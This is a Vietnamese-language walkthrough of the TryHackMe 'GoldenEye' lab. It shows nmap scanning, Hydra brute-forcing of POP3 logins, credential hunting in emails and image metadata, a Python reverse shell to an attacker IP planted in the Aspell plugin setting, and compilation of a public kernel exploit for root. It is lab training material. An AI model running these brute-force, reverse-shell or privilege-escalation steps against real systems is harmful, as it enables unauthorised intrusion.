TryHackMe - GoldenEye
Một cuộc săn flag qua các trang web và plugin vô cùng mệt mỏi
Giới thiệu
Được rồi, room này được đánh giá là Trung bình, và mức độ đó khá hợp lý. Tôi đã gặp rất nhiều khó khăn nhưng cũng học được rất nhiều điều.
Task 1
Hãy bắt đầu bằng việc quét với Nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nmap -T4 -n -sC -sV -Pn -p- 10.10.177.35
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after: 2028-04-21T03:22:34
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_pop3-capabilities: USER SASL(PLAIN) TOP PIPELINING AUTH-RESP-CODE UIDL RESP-CODES CAPA
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP RESP-CODES SASL(PLAIN) STLS CAPA AUTH-RESP-CODE UIDL PIPELINING USER
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
Câu hỏi:
Sử dụng Nmap để quét tất cả các cổng trên mạng. Có bao nhiêu cổng đang mở?
Câu trả lời:
1
4
Hãy truy cập trang web 10.10.177.35:80.
Chúng ta có thể thấy một mật khẩu đã được mã hóa trong mã nguồn terminal.js.
Có vẻ nó đã được mã hóa HTML.
Câu hỏi:
Ai cần đảm bảo rằng họ cập nhật mật khẩu mặc định?
Câu trả lời:
1
boris
Câu hỏi:
Mật khẩu của họ là gì?
Câu trả lời:
1
<CENSORED>
Chúng ta đã đăng nhập thành công bằng thông tin đăng nhập này.
Task 2
Hãy tìm mật khẩu cho dịch vụ pop3.
1
$ hydra -l boris -P /usr/share/wordlists/rockyou.txt -t20 10.10.177.35 -s 55007 -I pop3
Câu hỏi:
Có lẽ nên dùng Hydra? Mật khẩu mới của họ là gì?
Câu trả lời:
1
se<CENSORED>
1
2
3
4
5
6
7
8
9
$ telnet 10.10.177.35 55007
Trying 10.10.177.35...
Connected to 10.10.177.35.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS <CENSORED>
+OK Logged in.
Bây giờ, chúng ta có thể liệt kê các email bằng các lệnh RETR 1, RETR 2 và RETR 3.
1
2
3
4
5
6
7
8
9
10
11
12
13
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
1
2
3
4
5
6
7
8
9
10
11
12
13
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
Không có gì đặc biệt thú vị ở đây, nhưng chúng ta đã có thêm một số tên người dùng và có thể thử brute-force chúng.
1
$ hydra -l natalya -P /usr/share/wordlists/rockyou.txt -t20 10.10.177.35 -s 55007 -I pop3
Câu hỏi:
Kiểm tra cổng 55007. Dịch vụ nào được cấu hình để sử dụng cổng này?
Câu trả lời:
1
telnet
Câu hỏi:
Bạn có thể tìm thấy gì trên dịch vụ này?
Câu trả lời:
1
emails
Câu hỏi:
Người dùng nào có thể phá mã của Boris?
Câu trả lời:
1
natalya
Task 3
Hãy thêm severnaya-station.com vào tệp /etc/hosts.
1
2
sudo nano /etc/hosts
10.10.177.35 severnaya-station.com
Hãy truy cập severnaya-station.com/gnocertdir.
Chúng ta có thể thấy một biểu mẫu đăng nhập. Sau một vài lần thử, chúng ta có thể sử dụng thông tin đăng nhập của Xenia.
Sau khi kiểm tra xung quanh, chúng ta tìm thấy một người dùng khác là dr_doak.
Sau khi brute-force mật khẩu, chúng ta có thể đăng nhập với tư cách Dr Doak và nhìn thấy tệp s3cret.txt trong khu vực tệp riêng tư.
1
2
3
4
5
6
7
8
9
10
└─$ cat s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Hãy tải tệp xuống và kiểm tra nó.
1
2
$ wget 10.10.177.35/dir007key/for-007.jpg
exiftool for-007.jpg
Và chúng ta tìm thấy một chuỗi được mã hóa bằng Base64.
1
2
└─$ echo <OUR STRING FROM FILE> | base64 -d
<PASSWORD>
Bây giờ, chúng ta có thể đăng nhập với tư cách admin vì đã có thông tin đăng nhập.
Task 4
Tôi hơi bế tắc nên đã sử dụng một gợi ý từ trang web TryHackMe:
HINT: Take a look int o Aspell, the spell checker plugin
Hãy kiểm tra Aspell. Có vẻ chúng ta đã tìm thấy một vị trí có thể chèn reverse shell.
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.75.122",1337)
Không hoạt động.
Sau khi chèn mã vào đó, chúng ta phải thêm một mục mới rồi kích hoạt plugin kiểm tra chính tả.
Thao tác này sẽ kích hoạt mã và chúng ta nhận được kết nối reverse shell.
Câu hỏi:
Phiên bản kernel là gì?
Câu trả lời:
1
3.13.0-32-generic
Để lấy flag cuối cùng, chúng ta được khuyên sử dụng https://www.exploit-db.com/exploits/37292.
Hãy tải exploit xuống và điều chỉnh nó theo nhu cầu của chúng ta.
Sau khi đưa exploit vào máy mục tiêu, chúng ta cần biên dịch nó.
1
2
$ cc exploit.c -o exploit
./exploit
1
2
cat /root/.flag.txt
<CENSORED>




